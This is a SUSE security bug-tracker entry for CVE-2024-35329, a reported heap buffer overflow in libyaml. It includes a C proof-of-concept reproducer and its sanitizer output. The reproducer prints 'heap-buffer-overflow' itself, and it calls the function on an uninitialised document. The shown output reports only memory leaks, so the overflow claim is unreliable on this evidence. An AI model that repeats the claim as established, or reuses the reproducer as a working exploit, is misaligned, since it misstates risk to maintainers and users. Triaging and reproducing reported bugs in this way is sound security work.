Bug 1226195 (CVE-2024-35329)

Summary: VUL-0: CVE-2024-35329: libyaml: vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c
Product: [Novell Products] SUSE Security Incidents
Reporter: SMASH SMASH <smash_bz>
Component: Incidents
Assignee: Jordi Massaguer <jmassaguerpla>
Status: NEW ---
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: abergmann, tina.mueller
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/410052/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-35329:5.4:(AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Comment 1 Alexander Bergmann 2024-06-11 14:20:11 UTC
Reproducer:
https://drive.google.com/file/d/1xgQ9hJ7Sn5RVEsdMGvIy0s3b_bg3Wyk-/view

/* Build:
 * gcc -fsanitize=address -Wall -o poc poc.c -lyaml
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */
#include <unistd.h>
#include <yaml.h>

void poc() {
    yaml_document_t document;
    /* The document is only zero-filled; it is never set up with
     * yaml_document_initialize(), so its node stack is empty. */
    memset(&document, 0, sizeof(yaml_document_t));
    yaml_char_t *anchor = (yaml_char_t *)"rsslab";   /* unused */
    yaml_char_t *tag = (yaml_char_t *)"tag:yaml.org,2002:str";
    yaml_sequence_style_t style = YAML_ANY_SEQUENCE_STYLE;
    (void)anchor;
    yaml_document_add_sequence(&document, tag, style);
}

int main(int argc, char *argv[])
{
    printf("heap-buffer-overflow on libyaml/src/api.c:1274:10\n");
    poc();
    return 0;
}


# ./poc
heap-buffer-overflow on libyaml/src/api.c:1274:10

=================================================================
==1524==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 64 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110)
    #1 0x7fcdf5408d81 in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d81)

Direct leak of 22 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf5886e30 in __interceptor_strdup (/usr/lib64/libasan.so.4+0x76e30)
    #1 0x7fcdf5408d6f in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d6f)

Direct leak of 1 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110)
    #1 0x7fcdf54067ad in yaml_stack_extend (/usr/lib64/libyaml-0.so.2+0x67ad)

SUMMARY: AddressSanitizer: 87 byte(s) leaked in 3 allocation(s).